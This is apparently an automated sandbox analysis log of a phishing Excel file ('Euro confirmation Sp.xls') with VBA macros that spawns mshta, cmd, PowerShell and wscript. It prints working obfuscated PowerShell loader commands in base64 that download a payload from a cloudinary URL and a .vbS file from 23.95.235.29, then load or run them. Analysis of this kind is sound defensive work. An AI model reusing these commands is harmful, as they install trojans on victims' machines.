        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispiculeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89A9352E7_2_000007FE89A9352E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89A96FEE7_2_000007FE89A96FEE
        Source: Euro confirmation Sp.xlsOLE indicator, VBA macros: true
        Source: ~DF634BD35CC9B94982.TMP.0.drOLE indicator, VBA macros: true
        Source: Euro confirmation Sp.xlsStream path 'MBD00609F25/\x1Ole' : https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea!(!'Aq/8x}T$]4jj8`6<|g a&ZY,q1?>+sE36$SIck+H'$T\$>wr`\%&hhF1N6Z*pvYP|-Zr10+-}/cHB19H5GKtded3fTY67EXDjjEeW1aoazMLuY0jbDVJSBpDiuhTOThdQanLKUOSgVgLLbwELWnBHgRwd4XIHMN7SFDdTLdIUpbxV9BgIx2Lba7k2FWeDTxtfjftXghhw5MET3Blx0unzdoi4dpYaoyuDBJc6N^t)^lqt55+QC9y
        Source: ~DF634BD35CC9B94982.TMP.0.drStream path 'MBD00609F25/\x1Ole' : https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea!(!'Aq/8x}T$]4jj8`6<|g a&ZY,q1?>+sE36$SIck+H'$T\$>wr`\%&hhF1N6Z*pvYP|-Zr10+-}/cHB19H5GKtded3fTY67EXDjjEeW1aoazMLuY0jbDVJSBpDiuhTOThdQanLKUOSgVgLLbwELWnBHgRwd4XIHMN7SFDdTLdIUpbxV9BgIx2Lba7k2FWeDTxtfjftXghhw5MET3Blx0unzdoi4dpYaoyuDBJc6N^t)^lqt55+QC9y
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2041
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2008
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2041
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2008
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2041Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2008Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2041Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2008
        Source: Process Memory Space: powershell.exe PID: 2956, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.phis.troj.expl.evad.winXLS@29/38@23/5
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbSJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA285.tmpJump to behavior
        Source: Euro confirmation Sp.xlsOLE indicator, Workbook stream: true
        Source: ~DF634BD35CC9B94982.TMP.0.drOLE indicator, Workbook stream: true
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................Y..............Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................4.Tk....}..w.....Y......\.......................(.P.....................x...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Y......}..w............0:x.......Tk....0.w.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................4.Tk....}..w.....Y......\.......................(.P.....................x...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Y......}..w............0:x.......Tk....0.w.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0:x.......Tk....0.w.....(.P............................. .......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Y......}..w............0:x.......Tk....0.w.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Y......}..w............0:x.......Tk....0.w.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Y......}..w............0:x.......Tk....0.w.....(.P.............................l.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........Y......}..w............0:x.......Tk....0.w.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................Y..............0....c...Wl.....}..w....x.......@E......^...............(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................Y...................c...Wl.....}..w....x.......@E......^...............(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m...............................................,..............3......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............8.......8.......@"......(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................X.[k....}..w............\.......................(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'.".[k......a.....(.P.....................H.......*.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................X.[k....}..w............\.......................(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.4.2.......[k......a.....(.P.....................H.......$.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............P.N.......[k......a.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............P.N.......[k......a.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............P.N.......[k......a.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............P.N.......[k......a.....(.P.............................T.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w............P.N.......[k......a.....(.P.....................H...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................`...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Mk....}..w....`.......\.......................(.P............. .......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`.......}..w............@._.......Mk............(.P............. .......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Mk....}..w....`.......\.......................(.P............. .......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`.......}..w............@._.......Mk............(.P............. .......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....x.......N.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.@._.......Mk............(.P............. .......x....... .......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`.......}..w............@._.......Mk............(.P............. .......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......... .......x.......@.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`.......}..w............@._.......Mk............(.P............. .......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...x.......N.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`.......}..w............@._.......Mk............(.P............. ...............l.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......`.......}..w............@._.......Mk............(.P............. .......x...............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................`...............0....q...Wl.....}..w............@E......^...............(.P............. .......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................`....................q...Wl.....}..w............@E......^...............(.P............. .......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m......5k......................5k......5k.......,..............3.......................5k.............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....l...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................5k.....}..w............8.......8.......@"......(.P.....l...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................E.Sk....}..w.....5k.....\.......................(.P.....l...............(...............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................r.e.s.o.l.v.e.d.:. .'.p.a.s.t.e...e.e.'.".Sk....8.X.....(.P.....l.......................*.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................E.Sk....}..w.....5k.....\.......................(.P.....l...............(...............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.4.2.......Sk....8.X.....(.P.....l.......................$.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................5k.....}..w..............E.......Sk....8.X.....(.P.....l...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................5k.....}..w..............E.......Sk....8.X.....(.P.....l...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................5k.....}..w..............E.......Sk....8.X.....(.P.....l...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................5k.....}..w..............E.......Sk....8.X.....(.P.....l.......................T.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........5k.....}..w..............E.......Sk....8.X.....(.P.....l...............................................
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
